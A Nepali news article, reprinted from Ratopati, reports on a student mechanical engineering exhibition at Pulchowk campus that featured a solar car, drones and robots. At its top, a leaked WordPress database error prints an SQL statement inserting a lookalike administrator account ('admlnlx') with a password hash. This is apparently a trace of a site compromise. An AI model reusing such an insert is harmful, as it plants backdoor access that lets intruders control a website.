WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BWclElhPiqmkWcFgel5nt1tn9SAjSk.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-23 23:01:02', '', 'admlnlx', 'admlnlx')
काठमाडौ,माघ २३-
पुल्चोक इन्जिनियरिङ क्याम्पसमा ३ दिनदेखि जारी बिज्ञान प्रर्दशनी समापन भएको छ । सातौ राष्ट्रिय मेकानिकल प्रर्दशनीमा मेकानिकल इन्जिनियरिङ पढ्दै गरेकाहरुले विभिन्न प्रविधिहरुको स्टल राखेका थिए ।
प्रविधि मेलाको सबैभन्दा आकर्षणको केन्द्र बनेको थियो सोलारबाट चल्ने कार । सोलार कार पश्चिमाञ्चल इन्जिनियरिङ क्याम्पस पोखराका ८ जना बिद्यार्थीहरुको समूहले निमार्ण गरेको हो । उनीहरुले यसलाई नेपालको पहिलो सोलार कार भएको बताएका छन् ।
४ जना बस्न मिल्ने यो कारको छतमा राखिएको सोलार प्यानलको मद्धतले गुड्ने मेकानिकल इन्जिनियरिङका बिद्यार्थीले बताए ।पुल्चोक क्याम्पसका मेकानिकल इन्जिनियर विद्यार्थी समाजले गरेको कार्यक्रममा देशभर रहेका ५ ओटा मेकानिकल क्याम्पसका विद्यार्थीका ६० ओटा स्टल रहेको थियो । प्लस टु र स्नातक तहमा रहेका बिद्यार्थीहरुले आफूले बनाएको प्रविधी बिच प्रतिस्पर्धा गराएर बिजेता घोषणा गरी पुरस्कार प्रदान गरेको कार्यक्रमका संयोजक राहुल अर्यालले बताए ।
प्रविधि प्रर्दशनको पहिलो दिन विद्यार्थीहरुले ड्रोन रेसिङ प्रतियोगिता, दोश्रो दिन रोबोट फाइट र तेश्रो दिन रोबोट दौड प्रतियोगिता आयोजना गरेका थिए ।
प्रर्दशनीमा हावाले घुमाएर पानी तान्ने पम्प, तरकारी काट्ने मेसिन, तीन पाङ्ग्रे गाडी, सोलार कार, सोलार पानी तान्ने मेसिन, साना जलविद्युत आयोजनामा प्रयोग हुने टर्वाइन, चारै तर्फ मोड्न मिल्ने सामान बोक्ने उपकरण, खेतबारीमा बिषादी, मल, बिउ छर्न मिल्ने ड्रोन, धान काट्ने मेसिन लगायतको प्रर्दशन गरिएको थियो ।
रातोपाटीवाट साभार
हेर्नुहोस भिडियोमा :